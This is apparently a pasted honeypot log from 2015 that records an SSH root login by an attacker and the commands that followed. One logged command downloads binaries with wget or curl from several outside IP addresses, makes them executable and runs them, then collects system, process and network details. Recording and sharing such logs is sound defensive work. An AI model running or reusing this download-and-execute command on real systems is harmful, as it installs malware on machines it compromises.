Deltik

[HONEYPOT] 175.126.82.235 :: "fuck" installer

Jun 25th, 2015
  1. Jun 20 12:52:56 localhost sshd[6768]: Accepted password for root from 175.126.82.235 port 65452 ssh2
  2. Jun 20 12:52:56 localhost sshd[6768]: pam_unix(sshd:session): session opened for user root by (uid=0)
  3. Jun 20 12:52:56 localhost sshd[6768]: subsystem request for sftp
  4. Jun 20 12:52:56 localhost snoopy[6772]: [uid:0 sid:6772 tty:(none) cwd:/root filename:/bin/bash]: bash -c /usr/libexec/openssh/sftp-server
  5. Jun 20 12:52:56 localhost snoopy[6774]: [uid:0 sid:6772 tty:(none) cwd:/root filename:/sbin/consoletype]: /sbin/consoletype stdout
  6. Jun 20 12:52:56 localhost snoopy[6776]: [uid:0 sid:6772 tty:(none) cwd:/root filename:/usr/bin/id]: /usr/bin/id -u
  7. Jun 20 12:52:56 localhost snoopy[6772]: [uid:0 sid:6772 tty:(none) cwd:/root filename:/usr/libexec/openssh/sftp-server]: /usr/libexec/openssh/sftp-server
  8. Jun 20 12:53:11 localhost snoopy[6777]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/bash]: bash -c rm -rf /var/run/sftp.pid;filename="/fuck";$filename || (filename="/6002.rar";cd /;pwd;path=$filename;rm -f $path* || /dev/null > $path;for list in `echo http://43.255.188.2/ http://103.20.195.254/ http://122.10.85.54/`;do (wget -O $filename $list$filename || curl -o $filename $list$filename) && break;done ; if [ -f $path ];then chmod +x $path;$path && echo ExecOK;fi);sleep 1;uname -a;cat /etc/issue;df -h;ps -ef|grep -v $$||ps aux|grep -v $$||ps x|grep -v $$;netstat -antop|grep -v 127.0.0.1||netstat -ano|grep -v 127.0.0.1||netstat -an|grep -v 127.0.0.1;echo ExecOK;cat /var/run/sftp.pid && echo InstallOK;cat /var/run/mount.pid && echo InstallOK;cat /var/run/gcc.pid && echo InstallOK; url=http://43.255.188.2/g.rar;(wget --connect-timeout=20 $url || curl--connect-timeout 20 -O $url) && chmod +x g.rar && ./g.rar
  9. Jun 20 12:53:11 localhost snoopy[6779]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/sbin/consoletype]: /sbin/consoletype stdout
  10. Jun 20 12:53:11 localhost snoopy[6781]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/usr/bin/id]: /usr/bin/id -u
  11. Jun 20 12:53:11 localhost snoopy[6782]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/rm]: rm -rf /var/run/sftp.pid
  12. Jun 20 12:53:11 localhost snoopy[6783]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/fuck]: /fuck
  13. Jun 20 12:53:11 localhost snoopy[6785]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/sleep]: sleep 1
  14. Jun 20 12:53:11 localhost snoopy[6794]: [uid:0 sid:6788 tty:(none) cwd:/root filename:/bin/sed]: sed -i /\/etc\/cron.hourly\/gcc.sh/d /etc/crontab
  15. Jun 20 12:53:12 localhost snoopy[6813]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/uname]: uname -a
  16. Jun 20 12:53:12 localhost snoopy[6814]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/cat]: cat /etc/issue
  17. Jun 20 12:53:12 localhost snoopy[6815]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/df]: df -h
  18. Jun 20 12:53:12 localhost snoopy[6817]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/grep]: grep -v 6777
  19. Jun 20 12:53:12 localhost snoopy[6816]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/ps]: ps -ef
  20. Jun 20 12:53:12 localhost snoopy[6819]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/grep]: grep -v 127.0.0.1
  21. Jun 20 12:53:12 localhost snoopy[6818]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/netstat]: netstat -antop
  22. Jun 20 12:53:12 localhost snoopy[6820]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/cat]: cat /var/run/sftp.pid
  23. Jun 20 12:53:12 localhost snoopy[6821]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/cat]: cat /var/run/mount.pid
  24. Jun 20 12:53:12 localhost snoopy[6822]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/cat]: cat /var/run/gcc.pid
  25. Jun 20 12:53:12 localhost snoopy[6824]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/usr/bin/wget]: wget --connect-timeout=20 http://43.255.188.2/g.rar